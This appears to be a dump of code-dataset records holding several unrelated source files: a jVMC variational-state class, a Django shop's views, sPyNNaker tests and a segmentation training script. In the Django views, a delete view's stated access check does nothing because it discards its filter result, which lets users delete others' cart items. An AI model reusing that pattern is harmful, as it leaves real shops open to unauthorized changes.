form \n :math:`\\psi_\\\\theta(s)\\equiv\\exp(r_{\\\\theta_r}(s)+i\\\\varphi_{\\\\theta_\\\\phi}(s))` \\\n with an amplitude network :math:`r_{\\\\theta_{r}}` and a phase network \\\n :math:`\\\\varphi_{\\\\theta_\\phi}` \\\n parametrized by real valued parameters :math:`\\\\theta_r,\\\\theta_\\\\phi`.\n\n Initializer arguments:\n * ``net``: Variational network.\n A network has to be registered as pytree node and provide \\\n a ``__call__`` function for evaluation.\n It is expected that the network is of type ``jVMC.nets.sym_wrapper.SymNet``.\n If the network is composed of two networks, the correct wrapping structure is\n ``jVMC.nets.sym_wrapper.SymNet(jVMC.nets.two_nets_wrapper.TwoNets)``.\n * ``batchSize``: Batch size for batched network evaluation. Choice \\\n of this parameter impacts performance: with too small values performance \\\n is limited by memory access overheads, too large values can lead \\\n to \"out of memory\" issues.\n * ``seed``: Seed for the PRNG to initialize the network parameters.\n \"\"\"\n\n def __init__(self, net, \n batchSize=1000, \n seed=1234, \n orbit=None, \n avgFun=jVMC.nets.sym_wrapper.avgFun_Coefficients_Exp):\n \"\"\"Initializes NQS class.\n \n This class can operate in two modi:\n #. Single-network ansatz\n Quantum state of the form :math:`\\psi_\\\\theta(s)\\equiv\\exp(r_\\\\theta(s))`, \\\n where the network :math:`r_\\\\theta` is\n a) holomorphic, i.e., parametrized by complex valued parameters :math:`\\\\vartheta`.\n b) non-holomorphic, i.e., parametrized by real valued parameters :math:`\\\\theta`.\n #. Two-network ansatz\n Quantum state of the form \n :math:`\\psi_\\\\theta(s)\\equiv\\exp(r_{\\\\theta_r}(s)+i\\\\varphi_{\\\\theta_\\\\phi}(s))` \\\n with an amplitude network :math:`r_{\\\\theta_{r}}` and a phase network \\\n :math:`\\\\varphi_{\\\\theta_\\phi}` \\\n parametrized by real valued parameters :math:`\\\\theta_r,\\\\theta_\\\\phi`.\n Args: \n * ``net``: Variational network or tuple of networks.\n A network has to be registered as pytree node and provide \\\n a ``__call__`` function for evaluation. \\\n If a tuple of two networks is given, the first is used for the logarithmic \\\n amplitude and the second for the phase of the wave function coefficient.\n * ``batchSize``: Batch size for batched network evaluation. Choice \\\n of this parameter impacts performance: with too small values performance \\\n is limited by memory access overheads, too large values can lead \\\n to \"out of memory\" issues.\n * ``seed``: Seed for the PRNG to initialize the network parameters.\n * ``orbit``: Orbit which defining the symmetry operations (instance of ``util.symmetries.LatticeSymmetry``). \\\n If this argument is given, the wave function is symmetrized to be invariant under symmetry operations.\n * ``avgFun``: Reduction operation for the symmetrization.\n \"\"\"\n\n # The net arguments have to be instances of flax.nn.Model\n self.realNets = False\n self.holomorphic = False\n self.flat_gradient_function = flat_gradient_real\n self.dict_gradient_function = dict_gradient_real\n\n self.initialized = False\n self.seed = seed\n self.parameters = None\n\n self._isGenerator = False\n if isinstance(net, collections.abc.Iterable):\n net = jVMC.nets.two_nets_wrapper.TwoNets(net)\n if not orbit is None:\n net = jVMC.nets.sym_wrapper.SymNet(net=net, orbit=orbit, avgFun=avgFun)\n if \"sample\" in dir(net):\n if callable(net.sample):\n self._isGenerator = True\n self.net = net\n\n self.batchSize = batchSize\n\n # Need to keep handles of jit'd functions to avoid recompilation\n self._eval_net_pmapd = global_defs.pmap_for_my_devices(self._eval, in_axes=(None, None, 0, None), static_broadcasted_argnums=(0, 3))\n self._get_gradients_pmapd = global_defs.pmap_for_my_devices(self._get_gradients, in_axes=(None, None, 0, None, None), static_broadcasted_argnums=(0, 3, 4))\n self._append_gradients = global_defs.pmap_for_my_devices(lambda x, y: jnp.concatenate((x[:, :], 1.j * y[:, :]), axis=1), in_axes=(0, 0))\n self._get_gradients_dict_pmapd = global_defs.pmap_for_my_devices(self._get_gradients, in_axes=(None, None, 0, None, None), static_broadcasted_argnums=(0, 3, 4))\n self._append_gradients_dict = global_defs.pmap_for_my_devices(lambda x, y: tree_map(lambda a,b: jnp.concatenate((a[:, :], 1.j * b[:, :]), axis=1), x, y), in_axes=(0, 0))\n self._sample_jitd = {}\n\n # ** end def __init__\n\n\n def init_net(self, s):\n\n if not self.initialized:\n \n self.parameters = self.net.init(jax.random.PRNGKey(self.seed), s[0,0,...])\n self.realParams = False\n dtypes = [a.dtype for a in tree_flatten(self.parameters)[0]]\n if not all(d == dtypes[0] for d in dtypes):\n raise Exception(\"Network uses different parameter data types. This is not supported.\")\n if dtypes[0] == np.single or dtypes[0] == np.double:\n self.realParams = True\n \n # check Cauchy-Riemann condition to test for holomorphicity\n def make_flat(t):\n return jnp.concatenate([p.ravel() for p in tree_flatten(t)[0]])\n grads_r = make_flat( jax.grad(lambda a,b: jnp.real(self.net.apply(a,b)))(self.parameters, s[0,0,...])[\"params\"] )\n grads_i = make_flat( jax.grad(lambda a,b: jnp.imag(self.net.apply(a,b)))(self.parameters, s[0,0,...])[\"params\"] )\n if isclose(jnp.linalg.norm(grads_r - 1.j * grads_i)/grads_r.shape[0], 0.0, abs_tol=1e-14):\n self.holomorphic = True\n self.flat_gradient_function = flat_gradient_holo\n else:\n if self.realParams:\n self.flat_gradient_function = flat_gradient\n self.dict_gradient_function = dict_gradient\n else:\n self.flat_gradient_function = flat_gradient_cpx_nonholo\n\n self.paramShapes = [(p.size, p.shape) for p in tree_flatten(self.parameters[\"params\"])[0]]\n self.netTreeDef = jax.tree_util.tree_structure(self.parameters[\"params\"])\n self.numParameters = jnp.sum(jnp.array([p.size for p in tree_flatten(self.parameters[\"params\"])[0]]))\n\n self.initialized = True\n\n # ** end init_net\n\n\n def __call__(self, s):\n \"\"\"Evaluate variational wave function.\n \n Compute the logarithmic wave function coefficients :math:`\\ln\\psi(s)` for \\\n computational configurations :math:`s`.\n \n Args:\n * ``s``: Array of computational basis states.\n Returns:\n Logarithmic wave function coefficients :math:`\\ln\\psi(s)`.\n \n :meta public:\n \"\"\"\n\n self.init_net(s)\n\n return self._eval_net_pmapd(self.net, self.parameters, s, self.batchSize)\n\n\n def _eval(self, net, params, s, batchSize):\n\n sb = create_batches(s, batchSize)\n\n def scan_fun(c, x):\n return c, jax.vmap(lambda y: net.apply(params, y), in_axes=(0,))(x)\n\n res = jax.lax.scan(scan_fun, None, jnp.array(sb))[1].reshape((-1,))\n\n return res[:s.shape[0]]\n\n # ** end def __call__\n\n\n def _get_gradients(self, net, params, s, batchSize, flat_grad):\n\n sb = create_batches(s, batchSize)\n\n def scan_fun(c, x):\n return c, jax.vmap(lambda y: flat_grad(net, params, y), in_axes=(0,))(x)\n\n g = jax.lax.scan(scan_fun, None, sb)[1]\n\n g = tree_map(lambda x: x.reshape((-1,) + x.shape[2:]), g)\n\n #return g[:s.shape[0]]\n return tree_map(lambda x: x[:s.shape[0]], g)\n\n\n def gradients(self, s):\n \"\"\"Compute gradients of logarithmic wave function.\n \n Compute gradient of the logarithmic wave function coefficients, \\\n :math:`\\\\nabla\\ln\\psi(s)`, for computational configurations :math:`s`.\n \n Args:\n * ``s``: Array of computational basis states.\n Returns:\n A vector containing derivatives :math:`\\partial_{\\\\theta_k}\\ln\\psi(s)` \\\n with respect to each variational parameter :math:`\\\\theta_k` for each \\\n input configuration :math:`s`.\n \"\"\"\n \n self.init_net(s)\n\n return self._get_gradients_pmapd(self.net, self.parameters, s, self.batchSize, self.flat_gradient_function)\n\n # ** end def gradients\n\n\n def gradients_dict(self, s):\n \"\"\"Compute gradients of logarithmic wave function and return them as dictionary.\n \n Compute gradient of the logarithmic wave function coefficients, \\\n :math:`\\\\nabla\\ln\\psi(s)`, for computational configurations :math:`s`.\n \n Args:\n * ``s``: Array of computational basis states.\n Returns:\n A dictionary containing derivatives :math:`\\partial_{\\\\theta_k}\\ln\\psi(s)` \\\n with respect to each variational parameter :math:`\\\\theta_k` for each \\\n input configuration :math:`s`.\n \"\"\"\n \n self.init_net(s)\n\n # Here we need to add the treatment for the complex non-holomorphic case\n gradOut = self._get_gradients_dict_pmapd(self.net, self.parameters, s, self.batchSize, self.dict_gradient_function)\n\n if self.holomorphic:\n return self._append_gradients_dict(gradOut, gradOut)\n\n return gradOut\n\n # ** end gradients_dict\n\n\n def grad_dict_to_vec_map(self):\n\n PTreeShape = []\n start = 0\n P = jnp.arange(2*self.numParameters)\n for s in self.paramShapes:\n # Here we need to add the treatment for the complex non-holomorphic case\n if self.holomorphic:\n PTreeShape.append( ( P[start:start + 2*s[0]]) )\n start += 2*s[0]\n else:\n PTreeShape.append(P[start:start + s[0]])\n start += s[0]\n \n # Return unflattened parameters\n return tree_unflatten(self.netTreeDef, PTreeShape)\n\n\n def get_sampler_net(self):\n \"\"\"Get real part of NQS and current parameters\n\n This function returns a function that evaluates the real part of the NQS,\n :math:`\\\\text{Re}(\\log\\psi(s))`, and the current parameters.\n\n Returns:\n Real part of the NQS and current parameters\n \"\"\"\n\n evalReal = lambda p,x: jnp.real( self.net.apply(p,x) )\n if \"eval_real\" in dir(self.net):\n if callable(self.net.eval_real):\n evalReal = lambda p,x: jnp.real( self.net.apply(p,x,method=self.net.eval_real) )\n\n return evalReal, self.parameters\n\n # ** end def get_sampler_net\n\n def sample(self, numSamples, key, parameters=None):\n\n if self._isGenerator:\n net, params = self.net, self.parameters\n\n if parameters is not None:\n params = parameters\n\n numSamplesStr = str(numSamples)\n\n # check whether _get_samples is already compiled for given number of samples\n if not numSamplesStr in self._sample_jitd:\n self._sample_jitd[numSamplesStr] = global_defs.pmap_for_my_devices(lambda p, n, x: net.apply(p, n, x, method=net.sample),\n static_broadcasted_argnums=(1,), in_axes=(None, None, 0))\n\n samples = self._sample_jitd[numSamplesStr](params, int(numSamples), key)\n\n return samples\n\n return None\n\n # ** end def sample\n\n def _sample(self, net, params, numSamples, key):\n\n return net.apply(params, numSamples, key, method=net.sample)\n\n\n def update_parameters(self, deltaP):\n \"\"\"Update variational parameters.\n \n Sets new values of all variational parameters by adding given values.\n If parameters are not initialized, parameters are set to ``deltaP``.\n \n Args:\n * ``deltaP``: Values to be added to variational parameters.\n \"\"\"\n\n if not self.initialized:\n self.set_parameters(deltaP)\n\n # Compute new parameters\n newParams = jax.tree_util.tree_map(\n jax.lax.add, self.params,\n self._param_unflatten(deltaP)\n )\n\n # Update model parameters\n self.params = newParams\n\n # ** end def update_parameters\n\n\n def set_parameters(self, P):\n \"\"\"Set variational parameters.\n \n Sets new values of all variational parameters.\n \n Args:\n * ``P``: New values of variational parameters.\n \"\"\"\n\n if not self.initialized:\n raise RuntimeError(\"Error in NQS.set_parameters(): Network not initialized. Evaluate net on example input for initialization.\")\n\n # Update model parameters\n if isinstance(P, flax.core.frozen_dict.FrozenDict):\n self.params = P\n else:\n self.params = self._param_unflatten(P)\n\n # ** end def set_parameters\n\n\n def _param_unflatten(self, P):\n\n # Reshape parameter update according to net tree structure\n PTreeShape = []\n start = 0\n for s in self.paramShapes:\n if not self.realParams:\n PTreeShape.append( ( P[start:start + s[0]] + 1.j * P[start + s[0]:start + 2*s[0]]).reshape(s[1]) )\n start += 2*s[0]\n else:\n PTreeShape.append(P[start:start + s[0]].reshape(s[1]))\n start += s[0]\n \n # Return unflattened parameters\n return tree_unflatten(self.netTreeDef, PTreeShape)\n\n # ** end def _param_unflatten\n\n\n def get_parameters(self):\n \"\"\"Get variational parameters.\n \n Returns:\n Array holding current values of all variational parameters.\n \"\"\"\n\n if not self.initialized:\n\n return None\n\n\n if not self.realParams:\n paramOut = jnp.concatenate([jnp.concatenate([p.ravel().real, p.ravel().imag]) for p in tree_flatten(self.params)[0]])\n else:\n paramOut = jnp.concatenate([p.ravel() for p in tree_flatten(self.params)[0]])\n\n return paramOut\n\n # ** end def set_parameters\n\n @property\n def is_generator(self):\n return self._isGenerator\n\n @property\n def params(self):\n if self.initialized:\n return self.parameters[\"params\"]\n return None\n\n @params.setter\n def params(self, val):\n # Replace 'params' in parameters by `val`\n self.parameters = freeze({\n **unfreeze(self.parameters.pop(\"params\")[0]),\n \"params\": unfreeze(val)\n })\n\n","repo_name":"markusschmitt/vmc_jax","sub_path":"jVMC/vqs.py","file_name":"vqs.py","file_ext":"py","file_size_in_byte":18600,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"31"} +{"seq_id":"36554308372","text":"from django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.urls import reverse_lazy\nfrom django.utils.decorators import method_decorator\nfrom django.views.decorators.http import require_POST\n\nfrom django.views.generic import ListView, DetailView, DeleteView\n\nfrom shop.forms import AddQuantityForm\nfrom shop.models import Product, Order, OrderItem\n\n\nclass ProductsListView(ListView):\n model = Product\n template_name = 'shop/shop.html'\n\n\nclass ProductsDetailView(DetailView):\n model = Product\n template_name = 'shop/shop-single.html'\n\n\n@login_required(login_url=reverse_lazy('login'))\ndef add_item_to_cart(request, pk):\n if request.method == 'POST':\n quantity_form = AddQuantityForm(request.POST)\n if quantity_form.is_valid():\n quantity = quantity_form.cleaned_data['quantity']\n if quantity:\n cart = Order.get_cart(request.user)\n product = get_object_or_404(Product, pk=pk)\n cart.orderitem_set.create(product=product,\n quantity=quantity,\n price=product.price)\n cart.save()\n return redirect('cart_view')\n else:\n pass\n return redirect('shop')\n\n\n@login_required(login_url=reverse_lazy('login'))\ndef cart_view(request):\n cart = Order.get_cart(request.user)\n items = cart.orderitem_set.all()\n context = {\n 'cart': cart,\n 'items': items,\n }\n return render(request, 'shop/cart.html', context)\n\n\n@method_decorator(login_required, name='dispatch')\nclass CartDeleteItem(DeleteView):\n model = OrderItem\n template_name = 'shop/cart.html'\n success_url = reverse_lazy('cart_view')\n\n # Проверка доступа\n def get_queryset(self):\n qs = super().get_queryset()\n qs.filter(order__user=self.request.user)\n return qs\n\n\n@login_required(login_url=reverse_lazy('login'))\ndef make_order(request):\n cart = Order.get_cart(request.user)\n cart.make_order()\n return redirect('shop')\n\n\n@login_required(login_url=reverse_lazy('login'))\ndef history_page(request):\n history = Order.get_history(request.user)\n context = {\n 'history': history,\n }\n return render(request, 'shop/history.html', context)\n\n\ndef male_category_page(request):\n category = Product.get_all_by_male_cat(request.user)\n context = {\n 'category': category,\n }\n return render(request, 'shop/male_cat.html', context)\n\n\ndef female_category_page(request):\n category = Product.get_all_by_female_cat(request.user)\n context = {\n 'category': category,\n }\n return render(request, 'shop/female_cat.html', context)\n\n\ndef top_category_page(request):\n category = Product.get_all_by_TOP(request.user)\n context = {\n 'category': category,\n }\n return render(request, 'shop/top_cat.html', context)\n\n\ndef bottom_category_page(request):\n category = Product.get_all_by_BOTTOM(request.user)\n context = {\n 'category': category,\n }\n return render(request, 'shop/bottom_cat.html', context)\n\n\ndef accessories_category_page(request):\n category = Product.get_all_by_ACCESSORIES(request.user)\n context = {\n 'category': category,\n }\n return render(request, 'shop/accessories_cat.html', context)\n\n\ndef order_list_increase(request):\n category = Product.get_by_increase_price(request.user)\n context = {\n 'category': category\n }\n return render(request, 'shop/increase_price_page.html', context)\n\n\ndef order_list_decline(request):\n category = Product.get_by_decline_price(request.user)\n context = {\n 'category': category\n }\n return render(request, 'shop/decline_price.html', context)\n\n\ndef favorites(request):\n favorite_products = Product.objects.filter(is_favorite=True)\n context = {'favorite_products': favorite_products}\n return render(request, 'shop/favorites.html', context)\n\ndef add_to_favorite(request, prod_id):\n product = Product.objects.get(id=prod_id)\n if product.is_favorite == True:\n product.is_favorite = False\n product.save()\n elif product.is_favorite == False:\n product.is_favorite = True\n product.save()\n return redirect('shop')\n\n# product = Product.objects.get(id=prod_id)\n# product.is_favorite = True\n# product.save()\n# return redirect('shop')","repo_name":"KnightOfMelons/Shop-with-Django","sub_path":"shop/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"7058950720","text":"import argparse\nfrom os.path import abspath, dirname\n\n\ndef get_args() -> argparse.Namespace:\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--no_tokenize\",\n action='store_true',\n help=\"Do not do word level tokenization, only return full sentence\",\n )\n parser.add_argument(\n \"--gold_directory\",\n type=str,\n default=\"/dropbox/22-23/575x/Data/models/devtest\",\n help=\"Path to the directory containing gold summary\",\n )\n parser.add_argument(\n \"--docset\",\n type=str,\n default=\"A\",\n help=\"Select which docset to parse\",\n )\n args, unknown = parser.parse_known_args()\n return args\n","repo_name":"LING-575-Summarization/Summarization","sub_path":"src/preprocess/args.py","file_name":"args.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"30073000845","text":"n = int(input(\"n :\"))\narr = [2,3,6,6,5]\n\narr.sort()\nmax = -100\nfor i in arr:\n if i>max:\n max = i\nm = arr.count(max)\n\nprint(arr[n-m-1])","repo_name":"i-bilge/HackerRank","sub_path":"Runer-Up.py","file_name":"Runer-Up.py","file_ext":"py","file_size_in_byte":144,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"6344804058","text":"import numpy\nimport pytest\nimport pyNN.spiNNaker as sim\nfrom spinnaker_testbase import BaseTestCase\n\nN_NEURONS = 4\nLABEL = \"pop_1\"\n\n\nclass TestIDMixin(BaseTestCase):\n\n # NO unittest_setup() as sim.setup is called\n\n def test_cells(self):\n sim.setup(timestep=1.0)\n pop_1 = sim.Population(N_NEURONS, sim.IF_curr_exp(), label=LABEL)\n cells = pop_1.all_cells\n assert 0 == cells[0].id\n assert len(str(cells[0])) > 0\n assert len(repr(cells[0])) > 0\n assert not cells[1].__eq__(\"Not the same object\")\n sim.end()\n\n def test_get_set(self):\n sim.setup(timestep=1.0)\n pop_1 = sim.Population(N_NEURONS, sim.IF_curr_exp(), label=LABEL)\n cells = pop_1.all_cells\n p_tau_m = pop_1.get(\"tau_m\")\n tau_m_3 = cells[3].tau_m\n assert p_tau_m[3] == tau_m_3\n cells[2].tau_m = 2\n p_tau_m = pop_1.get(\"tau_m\")\n assert 2 == p_tau_m[2]\n params = cells[1].get_parameters()\n p_i_offset = pop_1.get(\"i_offset\")\n assert params[\"i_offset\"] == p_i_offset[1]\n cells[2].set_parameters(tau_m=3, i_offset=13)\n params = cells[2].get_parameters()\n assert 13 == params[\"i_offset\"]\n sim.end()\n\n def test_bad(self):\n sim.setup(timestep=1.0)\n pop_1 = sim.Population(4, sim.IF_curr_exp(), label=LABEL)\n cell = pop_1.all_cells[2]\n with pytest.raises(Exception):\n cell.variable_that_is_not_there\n with pytest.raises(Exception):\n cell.variable_that_is_not_there = \"pop\"\n sim.end()\n\n def test_is_local(self):\n sim.setup(timestep=1.0)\n pop_1 = sim.Population(N_NEURONS, sim.IF_curr_exp(), label=LABEL)\n cells = pop_1.all_cells\n assert pop_1.is_local(2) == cells[2].local\n sim.end()\n\n \"\"\"\n def test_positions(self):\n grid_structure = sim.Grid2D(dx=1.0, dy=1.0, x0=0.0, y0=0.0)\n positions = grid_structure.generate_positions(4)\n pos_T = positions.T\n sim.setup(timestep=1.0)\n pop_1 = sim.Population(N_NEURONS, sim.IF_curr_exp(), label=LABEL)\n cells = pop_1.all_cells\n assert \"q\" == pop_1.position[1]\n \"\"\"\n\n def test_init_by_in(self):\n sim.setup(timestep=1.0)\n pop = sim.Population(N_NEURONS, sim.IF_curr_exp(), label=LABEL)\n assert [-65.0, -65.0, -65.0, -65.0] == pop.initial_values[\"v\"]\n cells = pop.all_cells\n cells[1].set_initial_value(variable=\"v\", value=-60)\n assert -60 == cells[1].get_initial_value(\"v\")\n cells[2].initialize(v=-59)\n assert -59 == cells[2].initial_values[\"v\"]\n assert [-65.0, -60.0, -59.0, -65.0] == pop.initial_values[\"v\"]\n sim.end()\n\n def test_initial_values(self):\n sim.setup(timestep=1.0)\n pop = sim.Population(N_NEURONS, sim.IF_curr_exp(), label=LABEL)\n cells = pop.all_cells\n assert -65 == cells[1].get_initial_value(\"v\")\n cells[1].set_initial_value(\"v\", -60)\n assert [-65.0, -60.0, -65.0, -65.0] == pop.initial_values[\"v\"]\n sim.end()\n\n def test_asview(self):\n sim.setup(timestep=1.0)\n pop = sim.Population(4, sim.IF_curr_exp(), label=LABEL)\n cell = pop[2]\n cell.as_view()\n\n def test_ssa_spike_times(self):\n n_atoms = 10\n set_id = 1\n set_value = [5]\n sim.setup(timestep=1.0)\n pop = sim.Population(n_atoms, sim.SpikeSourceArray([]))\n pop[set_id].set_parameters(spike_times=set_value)\n result = pop.get(\"spike_times\")\n result_should_be = []\n for atom in range(n_atoms):\n if atom == set_id:\n result_should_be.append(numpy.array(set_value))\n else:\n result_should_be.append([])\n self.assertEqual(result, result_should_be)\n","repo_name":"SpiNNakerManchester/sPyNNaker","sub_path":"unittests/test_pop_views_assembly/test_idmixin.py","file_name":"test_idmixin.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"31"} +{"seq_id":"36703963828","text":"import argparse\nimport logging\nimport os\nimport sys\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch import optim\nfrom tqdm import tqdm\n\nfrom train_fxns import *\nimport segmentation_models_pytorch as smp\nfrom segmentation_models_pytorch import Unet\n\nfrom torch.utils.tensorboard import SummaryWriter\nfrom torch.utils.data import DataLoader, random_split\n\nimport datetime\n\ndir_checkpoint = None\n\n\ndef train_net(\n net,\n device,\n epochs=5,\n batch_size=1,\n lr=0.001,\n val_percent=0.1,\n save_cp=True,\n img_scale=0.5,\n):\n\n dataset = BasicDataset(dir_img, dir_mask, img_scale) # Preprocess dataset\n n_val = int(len(dataset) * val_percent)\n n_train = len(dataset) - n_val\n train, val = random_split(dataset, [n_train, n_val]) # Train/validation split\n # Pytorch data loader. Try setting num_workers to run two scripts in parallel\n train_loader = DataLoader(\n train, batch_size=batch_size, shuffle=True, num_workers=0, pin_memory=True\n )\n val_loader = DataLoader(\n val,\n batch_size=batch_size,\n shuffle=False,\n num_workers=0,\n pin_memory=True,\n drop_last=True,\n )\n\n writer = SummaryWriter(\n log_dir=dir_checkpoint, comment=f\"LR_{lr}_BS_{batch_size}_SCALE_{img_scale}\"\n )\n global_step = 0\n\n logging.info(\n f\"\"\"Starting training:\n Epochs: {epochs}\n Batch size: {batch_size}\n Learning rate: {lr}\n Training size: {n_train}\n Validation size: {n_val}\n Checkpoints: {save_cp}\n Device: {device.type}\n Images scaling: {img_scale}\n \"\"\"\n )\n\n # Essentially gradient decent with momentum (adaptive learning rate)\n optimizer = optim.RMSprop(net.parameters(), lr=lr, weight_decay=1e-8, momentum=0.9)\n # Dynamic learning rate based on validation\n scheduler = optim.lr_scheduler.ReduceLROnPlateau(\n optimizer, \"min\" if classes > 1 else \"max\", patience=10\n )\n if classes > 1:\n criterion = nn.CrossEntropyLoss()\n else:\n criterion = nn.BCEWithLogitsLoss()\n\n for epoch in range(epochs): # Training loop\n net.train()\n\n epoch_loss = 0\n with tqdm(\n total=n_train, desc=f\"Epoch {epoch + 1}/{epochs}\", unit=\"img\"\n ) as pbar: # Shows progress of scepific functions in trining loop\n for batch in train_loader: # Loop through batch size\n imgs = batch[\"image\"]\n true_masks = batch[\"mask\"]\n assert imgs.shape[1] == in_channels, (\n f\"Network has been defined with {in_channels} input channels, \"\n f\"but loaded images have {imgs.shape[1]} channels. Please check that \"\n \"the images are loaded correctly.\"\n )\n\n imgs = imgs.to(\n device=device, dtype=torch.float32\n ) # Load the images to the specified device\n mask_type = torch.float32 if classes == 1 else torch.long\n true_masks = true_masks.to(device=device, dtype=mask_type)\n\n masks_pred = net(imgs) # Pass the images through the specified CNN\n loss = criterion(\n masks_pred, true_masks\n ) # Loss after passing through CNN\n epoch_loss += loss.item()\n writer.add_scalar(\n \"Loss/train\", loss.item(), global_step\n ) # Adding loss values to log\n\n pbar.set_postfix(**{\"loss (batch)\": loss.item()})\n\n optimizer.zero_grad()\n loss.backward()\n nn.utils.clip_grad_value_(net.parameters(), 0.1)\n optimizer.step()\n\n pbar.update(imgs.shape[0])\n global_step += 1\n if global_step % (n_train // (10 * batch_size)) == 0:\n for tag, value in net.named_parameters():\n tag = tag.replace(\".\", \"/\")\n writer.add_histogram(\n \"weights/\" + tag, value.data.cpu().numpy(), global_step\n )\n writer.add_histogram(\n \"grads/\" + tag, value.grad.data.cpu().numpy(), global_step\n )\n val_score = eval_net(net, val_loader, device)\n scheduler.step(val_score)\n writer.add_scalar(\n \"learning_rate\", optimizer.param_groups[0][\"lr\"], global_step\n )\n\n if classes > 1:\n logging.info(\"Validation cross entropy: {}\".format(val_score))\n writer.add_scalar(\"Loss/test\", val_score, global_step)\n else:\n logging.info(\"Validation Dice Coeff: {}\".format(val_score))\n writer.add_scalar(\"Dice/test\", val_score, global_step)\n\n writer.add_images(\"images\", imgs, global_step)\n if classes == 1:\n writer.add_images(\"masks/true\", true_masks, global_step)\n writer.add_images(\n \"masks/pred\", torch.sigmoid(masks_pred) > 0.5, global_step\n )\n\n if save_cp:\n if epoch % 5 == 0: # Saving model every 5 epochs\n try:\n os.mkdir(dir_checkpoint)\n logging.info(\"Created checkpoint directory\")\n except OSError:\n pass\n torch.save(\n net.state_dict(), dir_checkpoint + f\"CP_epoch{epoch + 1}.pth\"\n )\n logging.info(f\"Checkpoint {epoch + 1} saved !\")\n\n writer.close()\n\n\ndef get_args():\n parser = argparse.ArgumentParser(\n description=\"Train the UNet on images and target masks\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n )\n parser.add_argument(\n \"-e\",\n \"--epochs\",\n metavar=\"E\",\n type=int,\n default=5,\n help=\"Number of epochs\",\n dest=\"epochs\",\n )\n parser.add_argument(\n \"-b\",\n \"--batch-size\",\n metavar=\"B\",\n type=int,\n nargs=\"?\",\n default=1,\n help=\"Batch size\",\n dest=\"batchsize\",\n )\n parser.add_argument(\n \"-l\",\n \"--learning-rate\",\n metavar=\"LR\",\n type=float,\n nargs=\"?\",\n default=0.0001,\n help=\"Learning rate\",\n dest=\"lr\",\n )\n parser.add_argument(\n \"-f\",\n \"--load\",\n dest=\"load\",\n type=str,\n default=False,\n help=\"Load model from a .pth file\",\n )\n parser.add_argument(\n \"-s\",\n \"--scale\",\n dest=\"scale\",\n type=float,\n default=0.5,\n help=\"Downscaling factor of the images\",\n )\n parser.add_argument(\n \"-v\",\n \"--validation\",\n dest=\"val\",\n type=float,\n default=10.0,\n help=\"Percent of the data that is used as validation (0-100)\",\n )\n parser.add_argument(\n \"-c\", \"--classes\", type=int, help=\"Model output channels\", default=1\n )\n parser.add_argument(\n \"-ic\", \"--in-channels\", type=int, help=\"Model input channels\", default=1\n )\n parser.add_argument(\n \"-d\", \"--device\", type=str, help=\"Select device\", default=\"cuda:0\"\n )\n parser.add_argument(\n \"-cp\",\n \"--checkpoint\",\n type=str,\n help=\"Name folder for checkpoints\",\n default=\"checkpoints/\",\n )\n parser.add_argument(\n \"-fn\", \"--file\", type=str, help=\"Name folder for images\", default=None\n )\n parser.add_argument(\n \"-mf\", \"--mask-folder\", type=str, help=\"Name for folder for mask\", default=None\n )\n parser.add_argument(\n \"-en\", \"--encoder\", type=str, help=\"Name of encoder\", default=\"resnet34\"\n )\n parser.add_argument(\n \"-wt\", \"--weight\", type=str, help=\"Encoder weights\", default=None\n )\n parser.add_argument(\"-a\", \"--architecture\", type=str, help=\"Name of architecture\")\n\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(\n level=logging.INFO, format=\"%(levelname)s: %(message)s\"\n ) # Initiate logging of metrics\n args = get_args() # Function to call arguments from argparse\n device = torch.device(\n args.device if torch.cuda.is_available() else \"cpu\"\n ) # Define the device\n # device = torch.device('cuda:1') # add argparser for this\n logging.info(f\"Using device {device}\")\n dir_checkpoint = args.checkpoint\n dir_img = args.file\n dir_mask = args.mask_folder\n\n # Change here to adapt to your data\n # in_channels=3 for RGB images\n # classes is the number of probabilities you want to get per pixel\n # - For 1 class and background, use classes=1\n # - For 2 classes, use classes=1\n # - For N > 2 classes, use classes=N\n in_channels = args.in_channels\n classes = args.classes\n encoder = args.encoder\n weight = args.weight\n architecture = args.architecture\n # net = smp.Unet(encoder_name=encoder, in_channels=in_channels, classes=classes, encoder_weights=weight)\n\n def arch_arg(architecture):\n if architecture.lower() == \"unet\":\n net = smp.Unet(\n encoder_name=encoder,\n in_channels=in_channels,\n classes=classes,\n encoder_weights=weight,\n )\n\n elif architecture.lower() == \"unetplusplus\":\n net = smp.UnetPlusPlus(\n encoder_name=encoder,\n in_channels=in_channels,\n classes=classes,\n encoder_weights=weight,\n )\n\n elif architecture.lower() == \"manet\":\n net = smp.MAnet(\n encoder_name=encoder,\n in_channels=in_channels,\n classes=classes,\n encoder_weights=weight,\n )\n\n elif architecture.lower() == \"linknet\":\n net = smp.Linknet(\n encoder_name=encoder,\n in_channels=in_channels,\n classes=classes,\n encoder_weights=weight,\n )\n\n elif architecture.lower() == \"fpn\":\n net = smp.FPN(\n encoder_name=encoder,\n in_channels=in_channels,\n classes=classes,\n encoder_weights=weight,\n )\n\n else:\n print(\"Architecture not recognized.\")\n quit()\n\n return net\n\n net = arch_arg(architecture)\n\n logging.info(\n f\"Network:\\n\"\n f\"\\t{in_channels} input channels\\n\"\n f\"\\t{classes} output channels (classes)\\n\"\n )\n\n if args.load:\n net.load_state_dict(torch.load(args.load, map_location=device))\n logging.info(f\"Model loaded from {args.load}\")\n\n net.to(device=device)\n # faster convolutions, but more memory\n # cudnn.benchmark = True\n\n try:\n train_net(\n net=net,\n epochs=args.epochs,\n batch_size=args.batchsize,\n lr=args.lr,\n device=device,\n img_scale=args.scale,\n val_percent=args.val / 100,\n )\n except KeyboardInterrupt:\n torch.save(net.state_dict(), \"INTERRUPTED.pth\")\n 